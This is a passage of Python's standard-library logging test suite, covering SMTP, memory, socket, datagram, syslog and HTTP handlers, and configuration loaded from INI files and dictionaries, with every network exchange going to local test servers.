# - end of server_helper section
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever
TIMEOUT = support.LONG_TIMEOUT
def test_basic(self):
sockmap = {}
server = TestSMTPServer((socket_helper.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (socket_helper.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
def test_race_between_set_target_and_flush(self):
class MockRaceConditionHandler:
def __init__(self, mem_hdlr):
self.mem_hdlr = mem_hdlr
self.threads = []
def removeTarget(self):
self.mem_hdlr.setTarget(None)
def handle(self, msg):
thread = threading.Thread(target=self.removeTarget)
self.threads.append(thread)
thread.start()
target = MockRaceConditionHandler(self.mem_hdlr)
try:
self.mem_hdlr.setTarget(target)
for _ in range(10):
time.sleep(0.005)
self.mem_logger.info("not flushed")
self.mem_logger.warning("flushed")
finally:
for thread in target.threads:
support.join_thread(thread)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_config_set_handler_names(self):
test_config = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
handlers=hand1
[handler_hand1]
class=StreamHandler
formatter=form1
[formatter_form1]
format=%(levelname)s ++ %(message)s
"""
self.apply_config(test_config)
self.assertEqual(logging.getLogger().handlers[0].name, 'hand1')
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop()
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop()
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop()
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(socket_helper.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop()
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
class myCustomFormatter:
def __init__(self, fmt, datefmt=None):
pass
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
